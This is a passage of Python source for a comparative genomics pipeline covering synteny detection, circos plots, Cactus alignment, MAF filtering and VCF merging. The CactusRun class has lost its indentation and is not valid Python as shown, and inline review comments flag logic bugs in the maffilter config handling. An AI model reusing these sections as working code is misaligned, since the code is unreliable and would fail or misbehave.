        os.chdir(synteny_path)
        #subprocess.call('rm {0}/*.bck {0}/*.prj {0}/*.sds {0}/*.ssp {0}/*.suf {0}/*.tis {0}/*.des {0}/*.bed {0}/*.cds'.format(synteny_path),shell=True)
        # jcvi expects <name>.bed / <name>.cds in the working directory.
        for abs_path, link_name in zip([genome1.bed_file,genome2.bed_file,genome1.CDS_file,genome2.CDS_file],[genome1.protID+'.bed',genome2.protID+'.bed',genome1.protID+'.cds',genome2.protID+'.cds']):
            subprocess.call('ln -s %s %s'%(abs_path,link_name),shell=True)
        try:
            subprocess.call('python -m jcvi.compara.catalog ortholog --no_strip_names %s %s'%(genome1.short_name,genome2.short_name),shell=True)
        except:
            # Best-effort single retry on transient failure.
            subprocess.call('python -m jcvi.compara.catalog ortholog --no_strip_names %s %s'%(genome1.short_name,genome2.short_name),shell=True)
        if genome1.short_name != genome1.protID and genome2.short_name != genome2.protID:
            subprocess.call('mv %s.%s.lifted.anchors %s.%s.lifted.anchors'%(genome1.short_name,genome2.short_name,genome1.protID,genome2.protID),shell=True)
        self.synteny_file = os.path.abspath('%s.%s.lifted.anchors'%(genome1.protID,genome2.protID))
        os.chdir(pwd)
    def anchor2structure(self, q_genome, s_genome):
        """Parse a jcvi .lifted.anchors file ('###'-delimited blocks) into blocks."""
        anchor_file = self.synteny_file
        with open(anchor_file,'r') as f:
            anchors = f.read().split('###')[1:]
        synteny_structure = []
        for anchor in anchors:
            if anchor:
                genes = np.array([line.split()[:2] for line in anchor.splitlines() if line])
                if genes.shape[0] >= self.loci_threshold:
                    q_genes, s_genes = genes[:,0] , genes[:,1]
                    q_coords, s_coords = q_genome.df.loc[q_genes,:], s_genome.df.loc[s_genes,:]
                    #print q_coords[['xi','xf']]
                    # Block extent = min/max over all member genes' coordinates.
                    synteny_structure.append([q_coords.iloc[0,0],q_coords[['xi','xf']].values.min(),q_coords[['xi','xf']].values.max(),s_coords.iloc[0,0],s_coords[['xi','xf']].values.min(),s_coords[['xi','xf']].values.max()])
        self.synteny_structure = pd.DataFrame(synteny_structure,columns=['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf']).astype(str)
    def synteny_structure_2_bed(self,filename):
        """Write blocks as a 6-column BED with protID-prefixed chromosome names.

        NOTE(review): mutates synteny_structure in place (prefixes chr columns).
        """
        df = self.synteny_structure
        df['q_chr'] = np.vectorize(lambda x: self.q_genome.protID+'-'+x)(df['q_chr'])
        df['s_chr'] = np.vectorize(lambda x: self.s_genome.protID+'-'+x)(df['s_chr'])
        df.to_csv(filename,sep='\t',index=False,header=None)
    def synteny_structure_2_link(self, filename, bundle_links = False, link_gap = 10000):
        """Write blocks as a circos link file; optionally bundle nearby links."""
        self.chrom_colors = dict(self.q_genome.chrom_colors,**self.s_genome.chrom_colors)
        click.echo(str(self.chrom_colors))
        df = self.synteny_structure
        df['q_chr'] = np.vectorize(lambda x: self.q_genome.protID+'-'+x)(df['q_chr'])
        df['s_chr'] = np.vectorize(lambda x: self.s_genome.protID+'-'+x)(df['s_chr'])
        if 0:
            # disabled: swap query/subject column order
            df = df[['s_chr','s_xi','s_xf','q_chr','q_xi','q_xf']]
        df.to_csv(filename,sep=' ',index=False,header=None)
        if bundle_links:
            click.echo("./helper_scripts/circos-tools-0.22/tools/bundlelinks/bin/bundlelinks -max_gap {0} -links {1} > {1}.temp && cut -f 1-6 -d " " {1}.temp > {1} && rm {1}.temp".format(str(link_gap), filename))
            subprocess.call("./helper_scripts/circos-tools-0.22/tools/bundlelinks/bin/bundlelinks -max_gap {0} -links {1} > {1}.temp && cut -f 1-6 -d \" \" {1}.temp > {1} && rm {1}.temp".format(str(link_gap), filename), shell=True)
        if 0:
            # disabled: append per-link color attribute column
            df = pd.read_table(filename ,sep = ' ', header = None, names = ['q_chr','q_xi','q_xf','s_chr','s_xi','s_xf'])
            df['color'] = np.vectorize(lambda x: 'color=%s'%(self.chrom_colors[x]))(df['q_chr'])
            print(df)
            df.to_csv(filename, sep=' ', index=False, header=None)
        self.link = os.path.abspath(filename)
    def export_karyotypes(self,circos_input):
        """Write circos karyotype files for both genomes into circos_input."""
        self.s_genome.export_karyotype(circos_input+'/'+self.s_genome.protID+'.karyotype.txt')
        self.q_genome.export_karyotype(circos_input+'/'+self.q_genome.protID+'.karyotype.txt')
######################
#### GENOME CLASS ####
class Genome:
    """One genome assembly: FASTA sequence plus a gene BED table.

    `df` is a DataFrame indexed by gene name with columns chr, xi, xf.
    A gene BED can be derived from a GFF via jcvi when missing/empty.
    """
    def __init__(self, fasta_file, bed_file, protID, gff_file = '', gene_info = 'Name'):
        self.fasta_file = fasta_file
        self.fasta = Fasta(fasta_file)
        # GFF attribute key used to name genes when converting GFF -> BED.
        self.gene_info = gene_info
        self.bed_file = bed_file#os.path.abspath(bed_file)
        self.short_name = self.bed_file.split('/')[-1].replace('.bed3','').replace('.bed','')
        self.protID = protID
        self.gff_file = gff_file
        self.chrom_colors = {}
        # Regenerate the BED from the GFF when it is missing or empty.
        if self.gff_file and (os.path.exists(self.bed_file) == 0 or (os.path.exists(self.bed_file) and os.stat(self.bed_file).st_size == 0)):
            #click.echo('python -m jcvi.formats.gff bed --type=mRNA --key=%s %s > %s'%(self.gene_info,self.gff_file,self.bed_file))
            #print('python -m jcvi.formats.gff bed %s --type=mRNA --key=%s -o %s'%(self.gff_file,self.gene_info,self.bed_file))
            subprocess.call('python -m jcvi.formats.gff bed %s --type=mRNA --key=%s -o %s'%(self.gff_file,self.gene_info,self.bed_file),shell=True)#FIXME
        """
with open(gff_file,'r') as f:
for header_line,line in enumerate(f):
if line.startswith('#') == 0:
break
df = pd.read_table(gff_file, skiprows=header_line, header=None,names=['chr','rm_1','feature','xi','xf','rm_3','rm_4','rm_5','Annotation'])
df = df[df['feature'] == 'mRNA'].drop([feat for feat in list(df) if 'rm' in feat],axis=1)
df = df[np.vectorize(lambda line: 'longest=1' in line)(df['Annotation']).astype(bool)]
df['Gene'] = np.vectorize(lambda line: line.split(';')[1].replace('Name=',''))(df['Annotation'])
df['xi'] -= 1
df = df.drop(['feature','Annotation'],axis=1).reindex(columns=['chr','xi','xf','Gene'])
self.df = df
"""
        self.bed_file = os.path.abspath(self.bed_file)
        self.CDS_file = self.bed_file.replace('.bed3','.cds').replace('.bed','.cds')
        self.df = pd.read_table(self.bed_file,header=None,names=['chr','xi','xf','Gene'],dtype={'chr':str,'xi':np.int,'xf':np.int,'Gene':str},usecols=[0,1,2,3])
        self.df = self.df.set_index('Gene')
    def export_bed(self,filename):
        """Write the gene table back out as a 4-column BED file."""
        df = self.df.reset_index().rename(dict(index='Gene'),axis='columns').reindex(columns=['chr','xi','xf','Gene'])
        df.to_csv(filename,sep='\t',index=False,header=None)
    def extract_CDS(self): # python -m jcvi.formats.gff uniq t.PAC2_0.316.gff3 -o uniq.gff3
        """Generate the CDS FASTA from the GFF via jcvi when missing or empty."""
        if os.path.exists(self.CDS_file) == 0 or (os.path.exists(self.CDS_file) and os.stat(self.CDS_file).st_size == 0):
            subprocess.call('python -m jcvi.formats.gff load %s %s --parents=mRNA --children=CDS --id_attribute=%s -o %s'%(self.gff_file,self.fasta_file,self.gene_info,self.CDS_file),shell=True)
    def export_karyotype(self, filename, n_chromosomes=25, shorten_chr=False, chrom_file = ''):
        """Write a circos karyotype file for the largest chromosomes.

        chrom_file optionally restricts/renames chromosomes (one per line,
        or '<chrom> <display-name>' pairs). Also records per-chromosome
        colors in self.chrom_colors for link coloring.
        """
        df = pd.read_table(self.fasta_file+'.fai', header=None,names=['chr','length'],usecols=[0,1],dtype=dict(zip(['chr','length'],[str,np.int])))
        df = df.sort_values(['length'],ascending=False)
        chromosomes_names_dict = {}
        if chrom_file:
            with open(chrom_file) as f:
                chromosomes = f.read().splitlines()
            if len(chromosomes[0].split()) == 2:
                chr_tuples = map(lambda l: tuple(l.split()), chromosomes)
                chromosomes_names_dict = dict(chr_tuples)
                chromosomes = np.array(chr_tuples)[:,0]
            else:
                chromosomes = np.array(chromosomes)
            #print(df[np.isin(df['chr'].values,chromosomes)].set_index('chr'))
            df = df[np.isin(df['chr'].values,chromosomes)].set_index('chr').reindex(chromosomes).reset_index().rename({'index':'chr'})[['chr','length']]
        if n_chromosomes < df.shape[0]:
            df = df.iloc[:n_chromosomes,:].reset_index(drop=True)
        out_txt = []
        for i in range(df.shape[0]):
            chrom = df.loc[i,'chr']
            chr_name = (chromosomes_names_dict[chrom] if chromosomes_names_dict else chrom) if not shorten_chr else chrom[0] + chrom.split('_')[-1]
            # circos only defines 25 named chr colors; pick random RGB beyond that.
            if i >= 25:
                color = '%d,%d,%d'%(randint(1,255),randint(1,255),randint(1,255))
            else:
                color = 'chr%d'%(i+1)
            out_txt.append('chr - %s-%s %s 0 %d %s\n'%(self.protID,chrom,chr_name,df.loc[i,'length'],color))
            self.chrom_colors['%s-%s'%(self.protID,chrom)] = color
        with open(filename,'w') as f:
            f.writelines(out_txt)
        self.karyotype = os.path.abspath(filename)
######################
#### CIRCOS CLASS ####
class Circos:
    """Generate circos configuration files for one PairwiseSynteny and run circos."""
    def __init__(self,PairwiseSynteny):
        self.synteny = PairwiseSynteny
    def write_ideogram_config(self, filename='txideogram.conf'):
        """Write the ideogram section of the circos config; returns the path."""
        with open(filename,'w') as f:
            f.write("""<ideogram>
show = yes
<spacing>
default = 0.005r
</spacing>
radius = 0.9r
thickness = 40p
fill = yes
show_label = yes
label_font = default
label_radius = 1.08r
label_size = 40
label_parallel = yes
show_bands = yes
fill_bands = yes
</ideogram>""")
        self.ideogram = filename
        return filename
    def write_ticks_config(self, filename='txticks.conf'):
        """Write the tick-mark section of the circos config; returns the path."""
        with open(filename,'w') as f:
            f.write("""show_ticks = yes
show_tick_labels = yes
<ticks>
radius = 1.01r
color = black
thickness = 2p
multiplier = 1e-6
format = %d
<tick>
spacing = 1u
size = 5p
</tick>
<tick>
spacing = 5u
size = 10p
show_label = yes
label_size = 20p
label_offset = 10p
format = %d
</tick>
</ticks>""")
        self.ticks = filename
        return filename
    def generate_config(self, ticks = 'txticks.conf', ideogram = 'txideogram.conf', links_and_rules = 'linksAndrules.conf', config='circos.conf', variable_thickness = False, thickness_factor=1000, switch_lines = False):
        """Write the top-level circos.conf plus the links/rules include file.

        switch_lines colors links by the query genome instead of the subject;
        variable_thickness scales link thickness by block size / thickness_factor.
        """
        colors = pd.read_table(self.synteny.s_genome.karyotype if not switch_lines else self.synteny.q_genome.karyotype,header=None,usecols=[2,6],sep=' ').as_matrix()
        self.links_and_rules = links_and_rules
        self.config = config
        self.ideogram,self.ticks = ideogram, ticks
        # NOTE(review): these hasattr checks are always True (the attributes
        # were just assigned above), so both sub-configs are always rewritten.
        if hasattr(self, 'ticks'):
            self.write_ticks_config(self.ticks)
        if hasattr(self, 'ideogram'):
            self.write_ideogram_config(self.ideogram)
        with open(self.config,'w') as f:
            f.write("""# circos.conf
karyotype = %s, %s
chromosomes_units = 1000000
chromosomes_display_default = yes
<<include %s>>
<<include %s>>
<<include %s>>
<image>
<<include etc/image.conf>>
</image>
<<include etc/colors_fonts_patterns.conf>>
<<include etc/housekeeping.conf>>
"""%(self.synteny.q_genome.karyotype , self.synteny.s_genome.karyotype, self.ideogram,self.ticks,self.links_and_rules))
        with open(self.links_and_rules,'w') as f:
            f.write("""
<links>
<link>
file = %s
radius = 0.99r
bezier_radius = 0r
%s
ribbon = yes
color = black
<rules>
<rule>
condition = var(intrachr)
show = no
</rule>\n"""%(self.synteny.link, 'thickness = eval(max(1,round(var(size1)/%d)))'%thickness_factor if variable_thickness else '') + '\n'.join(['<rule>\ncondition = %s(%s)\ncolor = %s\n</rule>'%('from' if switch_lines else 'to',chrom,color) for chrom,color in (self.synteny.q_genome.chrom_colors.items() if switch_lines else self.synteny.s_genome.chrom_colors.items())]) + '\n</rules>\n</link>\n</links>') # map(tuple,colors)
    def run_circos(self, output_dir='./', pdf=False):
        """Run circos on the generated config; optionally convert the PNG to PDF."""
        subprocess.call('circos -conf %s -outputfile %s-%s -outputdir %s'%(self.config,self.synteny.q_genome.protID,self.synteny.s_genome.protID,output_dir),shell=True)
        if pdf:
            subprocess.call('convert %s/%s-%s.png %s/%s-%s.pdf'%(os.path.abspath(output_dir),self.synteny.q_genome.protID,self.synteny.s_genome.protID,os.path.abspath(output_dir),self.synteny.q_genome.protID,self.synteny.s_genome.protID),shell=True)
##########################
#### CACTUS RUN CLASS ####
class CactusRun:
def __init__(self,fasta_output_path,cactus_run_directory,cactus_softlink, nickname_file = '', fasta_path = ''):
self.fasta_output_path = fasta_output_path +'/'
self.cactus_run_directory = cactus_run_directory +'/'
self.cactus_output = self.cactus_run_directory+'output/'
self.hal_path = self.cactus_output+'hal/'
self.cactus_softlink = os.path.abspath(cactus_softlink+'/bin/runProgressiveCactus.sh')
if not nickname_file:
self.nickname_file = self.cactus_run_directory + 'prot_dict'
self.protIDs = [fasta.split('_')[-2] for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')]
with open(self.nickname_file,'w') as f:
f.write('\n'.join(['\t'.join((protID,)*2) for protID in self.protIDs]))
else:
self.nickname_file = nickname_file
self.cactus_env_softlink = os.path.abspath(cactus_softlink+'/environment')
#subprocess.call('source %s'%cactus_env_softlink,shell=True)
def fasta2seq(self, fasta):
self.nickname2file_dict = {}
self.fasta_run_dir = self.cactus_output+fasta[fasta.rfind('/')+1:].split('.')[0]+'/'
try:
os.mkdir(self.fasta_run_dir)
except:
pass
subprocess.call('rm %s/*.fa %s/*.fasta -r'%(self.fasta_run_dir,self.fasta_run_dir),shell=True)
with open(fasta) as f1:
records = SeqIO.parse(f1,'fasta')
for record in records:
protID = record.id.split('.')[0]
nickname = self.nicknames[protID]
record.id = record.id.replace(protID,nickname)
record.description = record.id
SeqIO.write(record, open(self.fasta_run_dir+nickname+'.fa','a'),'fasta')
self.nickname2file_dict[nickname] = os.path.abspath(self.fasta_run_dir+nickname+'.fa')
self.generate_trees()
self.seqfile = self.fasta_run_dir+'seqfile'
with open(self.fasta_run_dir+'output_tree.nh','r') as f1, open(self.seqfile,'w') as f2:
f2.write(f1.read()+'\n'+'\n'.join(['%s %s'%(nickname, nickname_file) for nickname, nickname_file in self.nickname2file_dict.items()]))
run_file = os.path.abspath(self.seqfile+'.sh')
self.run_files.append(run_file)
with open(run_file,'w') as f:
f.write('#!/bin/bash\nexport _JAVA_OPTIONS="-Xmx155g"\n%s --maxThreads 16 %s %s %s >& %s\nscp %s %s'%(os.path.abspath(self.cactus_softlink),self.seqfile,self.fasta_run_dir,fasta.replace('.fasta','.hal'),self.seqfile+'.sh.stdout',fasta.replace('.fasta','.hal'),self.hal_path+fasta.split('/')[-1].replace('.fasta','.hal')))
return run_file
def write_fastas_seqfile(self):
with open(self.nickname_file,'r') as f:
self.nicknames = dict([tuple(line.split()) for line in f.read().splitlines() if line])
fastas = glob.glob(self.fasta_output_path+'/FastaOut*.fa')+glob.glob(self.fasta_output_path+'/FastaOut*.fasta')
self.run_files = []
fasta2seq = lambda fasta: self.fasta2seq(fasta)
p = mp.ProcessingPool()
r = p.amap(fasta2seq,fastas)
r.wait()
self.run_files = r.get()
p.close()
def run_cactus(self, submission = 'local', shifter = False):
with open('nextflow.config','w') as f:
f.write('\n'.join(["process.%s = '%s'"%(i,j) for i,j in zip(['executor','memory', 'clusterOptions'],[submission,'155G', '' if submission != 'sge' else '-P plant-analysis.p -cwd -l h_rt=24:00:00 -pe pe_slots 16 -e OutputFile.txt'])]+(["shifter.enabled = true"] if shifter else ["docker.enabled = true"])+["process.container = 'lepbase/progressive-cactus:latest'"]))
subprocess.call("export SHIFTER_RUNTIME='' && nextflow cactus_run.nf --work_dir %s --cactus_run_files %s --environment %s"%(os.getcwd(),','.join(os.path.abspath(run_file) for run_file in self.run_files),os.path.abspath(self.cactus_env_softlink)),shell=True)
#for run_file in self.run_files:
# subprocess.call('nohup sh %s &'%(run_file),shell=True)
# fixme, make sure to activate progressive cactus environment; sourcec environment in cactus folder, add hal2maf, send maf 2 cns analysis, parallelize and pipeline all scripts, maybe call nextflow from within python for each of the jobs for pipeline submission
def generate_trees(self,scaled = 10000, kmer_length = 23, multi_fasta = False):
# fixme use mafft to generate new guide trees for each set of input fasta files
subprocess.call('sourmash compute -f --scaled %d %s/*.fa -o %s.sig -k %d %s'%(scaled,self.fasta_run_dir,self.fasta_run_dir+'tree',kmer_length,'--singleton' if multi_fasta else ''),shell=True)
subprocess.call('sourmash compare %s.sig --csv %s.cmp.csv'%(self.fasta_run_dir+'tree',self.fasta_run_dir+'tree'),shell=True)
df = pd.read_csv('%s.cmp.csv'%(self.fasta_run_dir+'tree'),index_col = None)
samples = [fasta.split('/')[-1].replace('.fa','') for fasta in list(df)]
distance_matrix = df.as_matrix()
constructor = DistanceTreeConstructor()
dm = _DistanceMatrix(names=samples,matrix=[list(distance_matrix[i,0:i+1]) for i in range(len(samples))])
tree = constructor.nj(dm)
Phylo.write(tree,self.fasta_run_dir+'output_tree.nh','newick') # fixme bug, tree being generated has negative branch lengths, this is why cactus is failing
    def hal2maf(self, n_cpus, hal2maf_softlink):
        """Convert every .hal alignment under self.hal_path to .maf in parallel.

        n_cpus -- unused by the live code path; only referenced in the
            commented-out mp.Process implementation kept below.
        hal2maf_softlink -- path to the hal2maf executable to invoke.
        """
        self.hal2maf_softlink = hal2maf_softlink
        self.maf_path = self.hal_path.replace('hal','maf')
        run_hal = lambda hal: self.run_hal2maf(hal)
        # mp is presumably a pathos-style pool (amap = asynchronous map) —
        # TODO confirm against the import block at the top of the file.
        p = mp.ProcessingPool()
        r = p.amap(run_hal, glob.glob(self.hal_path+'/*.hal'))
        r.wait()
        p.close()
        """
        for hal in glob.glob(self.hal_path+'/*.hal'):
            proc = mp.Process(target=run_hal, args=(hal,))
            proc.daemon = True
            proc.start()
            while len(mp.active_childern()) > n_cpus:
                sleep(1)
            while len(mp.active_childern()) > 0:
                sleep(1)"""
def run_hal2maf(self,hal):
os.system('%s %s %s'%(self.hal2maf_softlink, hal, hal.replace('hal','maf')))
###################
#### MAF CLASS #### fixme try to inherit from circos class, maf class will allow you to extract CNS or VCF, visualize CS and CNS
class MAF_filter_config:
    """Builder for a maffilter .bpp parameter file.

    Filter clauses (Subset, VcfOutput) accumulate in self.endtxt; create_txt()
    renders them plus the input/log header into self.config_txt and writes the
    file, and run_maffilter() executes the bundled maffilter binary against it.
    """
    def __init__(self, config_file='maf_filter_config.bpp', input_file='merged.maf',species = 'list_species.txt', reference_species = '', log_file = 'log.out', out_all_species = True):
        # config_file -- output path of the maffilter parameter file
        # input_file -- maf alignment maffilter will consume
        # species -- comma separated names, or a .txt file with one name per line
        # reference_species -- species used as the VCF reference genome
        # out_all_species -- if True genotype every species, else drop the reference
        self.config_file = config_file
        self.config_txt = ''
        self.input_file = input_file
        self.input_format = 'Maf'
        self.log_file = log_file
        self.all_species = species.split(',') if not species.endswith('.txt') else open(species,'r').read().splitlines()
        all_species_but_one = set(self.all_species) - {reference_species}
        if out_all_species:
            self.species = self.all_species
        else:
            self.species = all_species_but_one
        self.reference_species = reference_species
        self.endtxt = []  # accumulated maf.filter clauses, in order of addition
    def export(self):
        # Write whatever text has been rendered so far (create_txt also writes itself).
        with open(self.config_file,'w') as f:
            f.write(self.config_txt)
    def add_subset_text(self, species = '', keep=True):
        # Append a Subset clause restricted to `species` (all species when empty).
        self.endtxt.append("""Subset(\\
strict=yes,\\
keep=%s,\\
species=(%s),\\
remove_duplicates=yes),\\"""%('yes' if keep else 'no', species if species else ','.join(self.all_species)))
    def add_vcf_text(self, vcf_file='vcfs/merged.vcf'):
        # Append a VcfOutput clause genotyping self.species against the reference.
        self.endtxt.append("""VcfOutput(\\
file=%s,\\
genotypes=(%s),\\
all=no,\\
reference=%s),\\"""%(vcf_file,','.join(self.species),self.reference_species))
    def create_txt(self):
        # Render header plus maf.filter clause list and write the parameter file.
        # NOTE(review): endtxt[:-3] drops the last three clauses — with the usual
        # three add_* calls this leaves maf.filter empty; possibly the intent was
        # to trim the trailing ',\' of the *joined string* instead — confirm.
        self.config_txt += """input.file=%s
input.format=%s
output.log=%s
maf.filter=\\\n"""%(self.input_file,self.input_format,self.log_file) +'\n'.join(self.endtxt[:-3])
        with open(self.config_file,'w') as f:
            f.write(self.config_txt)
    def run_maffilter(self):
        # Requires the maffilter binary under ./helper_scripts/.
        subprocess.call('./helper_scripts/maffilter param=%s'%self.config_file,shell=True)
class MAF:
    """Operations on a MAF multiple-alignment file: merging, byte-offset
    indexing, coordinate rewriting, strand normalization and VCF export
    through maffilter."""
    def __init__(self, maf_file, special_format = True):
        # maf_file -- path, comma separated list of paths, or glob pattern (see merge())
        # special_format -- retained flag; not read anywhere in this class
        self.maf_file = maf_file
        self.special_format = special_format
    def merge(self, new_maf_file='merged.maf'):
        """Concatenate the input maf files into new_maf_file, dropping ancestor
        (Anc*) and comment lines, and point self.maf_file at the result."""
        # bugfix: the wildcard test previously inspected new_maf_file, but a glob
        # pattern can only arrive via self.maf_file (the shell cat masked this).
        if '*' in self.maf_file:
            maf_files = glob.glob(self.maf_file)
        else:
            maf_files = self.maf_file.split(',')
        subprocess.call('rm %s'%new_maf_file,shell=True)
        # Single '##maf version=1' header followed by the filtered bodies.
        subprocess.call("(echo '##maf version=1'; ( cat %s | sed -e '/Anc/d;/#/d' ) ;) > %s"%(' '.join(maf_files),new_maf_file),shell=True)
        self.maf_file = new_maf_file
    def index(self):
        """Record the byte offset of every alignment block ('a' line) in
        self.idxs, and map each block start to the next start in self.idx."""
        idxs = []
        with open(self.maf_file,'r') as f:
            offset = 0
            for line in iter(f.readline, ''):
                if line.startswith('a'):
                    idxs.append(offset)
                offset = f.tell()
            idxs.append(f.tell())  # EOF sentinel so the last block gets an end offset
        idxs = sorted(set(idxs))
        self.idx = {idxs[i]:idxs[i+1] for i in range(len(idxs)-1)}
        self.idxs = sorted(self.idx.keys())
    def change_coordinates(self, reference_species,reference_species_chromosomes, changed_coordinates_file):
        """Rewrite per-sequence coordinates of every indexed block (local block
        coordinates -> chromosome coordinates encoded in the sequence names)
        and write the blocks containing reference_species to
        changed_coordinates_file. Requires index() to have been called."""
        def change_segment(segment, ref_species, ref_species_chr):
            # Returns (chrom, position, rewritten_block) when ref_species appears
            # in the block, or ('', '', '') when it is absent/unparsable.
            aln_lines = segment.splitlines()
            for i,line in enumerate(aln_lines):
                if line.startswith('s'):
                    lineList = line.split()
                    orientation = lineList[4]
                    # Sequence name looks like species.chrom_start_end; peel off _start_end.
                    lineList2 = lineList[1].split('.')
                    lineList3 = lineList2[-1].split('_')[-2:]
                    lineList2[-1] = lineList2[-1].replace('_'+'_'.join(lineList3),'')
                    lineList[1] = '.'.join(lineList2[1:])
                    if lineList2[0] == ref_species:
                        chrom = lineList2[-1]
                        lineList[5] = str(ref_species_chr[chrom])
                        if orientation == '-':
                            # Minus strand: offset is measured from the chromosome end.
                            lineList[2] = str(ref_species_chr[chrom]-int(lineList3[-1])+int(lineList[2]))#-int(lineList[3]))
                        else:
                            lineList[2] = str(int(lineList3[-2]) + int(lineList[2]))
                        position = int(lineList[2])
                    else:
                        lineList[2] = str(int(lineList3[-2]) + int(lineList[2]))
                    aln_lines[i] = '\t'.join(lineList)
            try:
                return chrom,position,'\n'.join(sorted(filter(None,aln_lines)))+'\n\n'
            except:
                # chrom/position never bound when ref_species was absent; skip block.
                return '', '', ''
        # Stream the file in 50k-block chunks to bound memory use.
        chunks = [self.idxs[i:i+50000] for i in range(0,len(self.idxs),50000)]
        with open(self.maf_file,'r') as f, open(changed_coordinates_file,'w') as f2:
            for chunk in chunks:
                out_segments = []
                for idx in chunk:
                    f.seek(idx)
                    chrom, position, segment = change_segment(f.read(self.idx[idx] - idx),reference_species,reference_species_chromosomes)
                    if chrom:
                        out_segments.append(segment)
                f2.write(''.join(out_segments))
        self.maf_file_new_coords = changed_coordinates_file
    def strand(self, reference_species):
        """Normalize block orientation with mafStrander so reference_species is
        always on the + strand, rewriting self.maf_file in place."""
        subprocess.call('./helper_scripts/mafStrander -m %s --seq %s > temp.maf'%(self.maf_file,reference_species),shell=True)
        # bugfix: shell=True was missing, so the string was exec'd as a single
        # program name and the rename never happened.
        subprocess.call('mv temp.maf %s'%self.maf_file,shell=True)
    def maf2vcf(self, maf_filter_config, species, reference_species, reference_species_fai, vcf_out, change_coordinates = True):
        """Run on a merged maf file first by using merger."""
        # chromosome -> length mapping pulled from the reference .fai index.
        reference_species_chromosomes = dict(zip(os.popen("awk '{print $1}' %s"%reference_species_fai).read().splitlines(),map(int,os.popen("awk '{print $2}' %s"%reference_species_fai).read().splitlines())))
        try:
            os.mkdir('vcfs')
        except:
            pass  # directory already exists
        self.strand(reference_species)
        self.index()
        if change_coordinates:
            self.change_coordinates(reference_species,reference_species_chromosomes, self.maf_file.replace('.maf','.new_coords.maf'))
        else:
            self.maf_file_new_coords = self.maf_file
        self.config = MAF_filter_config(maf_filter_config, self.maf_file_new_coords, species, reference_species)
        self.config.add_subset_text(keep=False)
        self.config.add_subset_text(species=reference_species)
        self.config.add_vcf_text(vcf_out)
        # TODO(review): the parameter file is never rendered to disk here
        # (neither create_txt() nor export() is called) before maffilter runs — confirm.
        self.config.run_maffilter()
        vcf_obj = SNP(vcf_out)
        vcf_obj.concat_vcf(vcf_out)
        vcf_obj.generate_new_header(vcf_out)
###################
#### SNP CLASS #### fixme vcf or tab file, as well as df, can local pca, local tree, final tree (run iqtree), visualize tree, produce new vcf files and interact with other snp objects
# fixme maybe add nextflow class?
# fixme add test classes
class SNP:
    """A variant call set held in a vcf/vcf.gz (or bcftools-query tab) file.

    Wraps concatenation, merging, header repair, tab/fasta conversion,
    intersection with bed regions, distribution plotting and the local-tree
    nextflow pipeline, mostly by shelling out to bcftools / bedtools /
    vcftools / nextflow.
    """
    def __init__(self, snp_file, snp_format = 'vcf'):
        # snp_file -- path (or comma separated paths for concat_vcf/merge_vcf)
        # snp_format -- 'vcf' (default) or 'tab' (bcftools query output)
        self.snp_file = snp_file
        self.format = snp_format
        if snp_format == 'tab':
            self.tab = self.snp_file
            print("Warning: Do not use vcf manipulation methods.")
    def concat_vcf(self, vcf_out):
        """Concatenate the comma separated vcf/vcf.gz files in self.snp_file,
        sort records by chromosome and position, reattach the collected meta
        header lines and write the result to vcf_out."""
        if self.format == 'vcf':
            list_vcfs = self.snp_file.split(',')
            master_df = pd.DataFrame()
            header_lines = []
            print(list_vcfs)  # consistency: function-call print like the rest of the file
            for vcf_in in list_vcfs:
                # Collect header lines up to and including #CHROM, remembering its line number.
                with os.popen(('z' if vcf_in.endswith('.gz') else '')+'cat %s'%vcf_in) as f:
                    line_count = 0
                    for line in f:
                        header_lines.append(line)
                        if line.startswith('#CHROM'):
                            line_info = line.strip('\n').split() # bugfix: was strip('/n'); split() masked it, but strip the newline as intended # FIXME can grab header line number here
                            break
                        line_count += 1
                if vcf_in.endswith('.gz'):
                    # Gzipped input: pull each column out with awk instead of pandas.
                    master_df = master_df.append(pd.DataFrame(np.hstack([np.array(os.popen(('z' if vcf_in.endswith('.gz') else '')+"cat %s | grep -v ^# | awk '{ print $%d }'"%(vcf_in,i+1)).read().splitlines())[:,None] for i in range(len(line_info))]),columns = line_info))
                else:
                    master_df = master_df.append(pd.read_table(vcf_in,header=line_count))
            header_lines = set(header_lines)
            master_df['POS'] = np.vectorize(int)(master_df['POS'])
            master_df = master_df.sort_values(['#CHROM','POS'])
            master_df.to_csv(vcf_out,sep='\t',index=False, na_rep = '.')
            # Re-prepend the (deduplicated) meta headers, then swap the file into place.
            with open(vcf_out.replace('.vcf','.headers.vcf'),'w') as f, open(vcf_out,'r') as f2:
                for line in [line2 for line2 in header_lines if '#CHROM' not in line2]:
                    f.write(line)
                f.write(f2.read())
            subprocess.call('mv %s %s'%(vcf_out.replace('.vcf','.headers.vcf'),vcf_out),shell=True)
            self.snp_file = vcf_out
        else:
            print('File(s) must be in vcf/vcf.gz format before proceeding.')
    def generate_new_header(self, vcf_out):
        """Rebuild a minimal VCFv4.1 header (contig, FILTER and FORMAT lines)
        for self.snp_file, normalize 'gap,unk' filters to 'gunk', reset the
        INFO/FORMAT columns and write the result to vcf_out."""
        if self.format == 'vcf':
            sort_vcf_in = self.snp_file
            header_line = '\n'+os.popen("grep '^#CHROM' %s"%sort_vcf_in).read().strip('\n')
            chrms = set(os.popen("awk '{ print $1}' %s | grep -v ^#"%sort_vcf_in).read().splitlines())
            # Contig lengths come from the POS column of each chromosome's last record.
            # bugfix: strip('\n') was strip('/n'); split() masked it.
            new_lines = """##fileformat=VCFv4.1\n"""+'\n'.join(sorted(['##contig=<ID=' + chrm + ',length=' + os.popen('grep %s %s | tail -n 1'%(chrm,sort_vcf_in)).read().strip('\n').split()[1] + '>' for chrm in chrms]))+'\n'+'\n'.join(['##FILTER=<ID=gap,Description="At least one sequence contains a gap">','##FILTER=<ID=unk,Description="At least one sequence contains an unresolved character">','##FILTER=<ID=gunk,Description="At least one sequence contains an unresolved character and gap.">','##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'])+header_line
            with open('new_header.txt','w') as f:
                f.write(new_lines+'\n')
            subprocess.call("""(cat new_header.txt;
sed 's/gap,unk/gunk/g' %s | grep -v ^#;) \
> %s"""%(sort_vcf_in,sort_vcf_in.replace('.vcf','.new_head.vcf')),shell=True)
            # Reload with the new header, blank INFO and force GT-only FORMAT.
            df = pd.read_table(sort_vcf_in.replace('.vcf','.new_head.vcf'),header=new_lines.count('\n')).fillna('.')
            df['INFO'] = '.'
            df['FORMAT'] = 'GT'
            df.to_csv(sort_vcf_in.replace('.vcf','.new_head.vcf'),sep='\t',index=False, na_rep = '.')
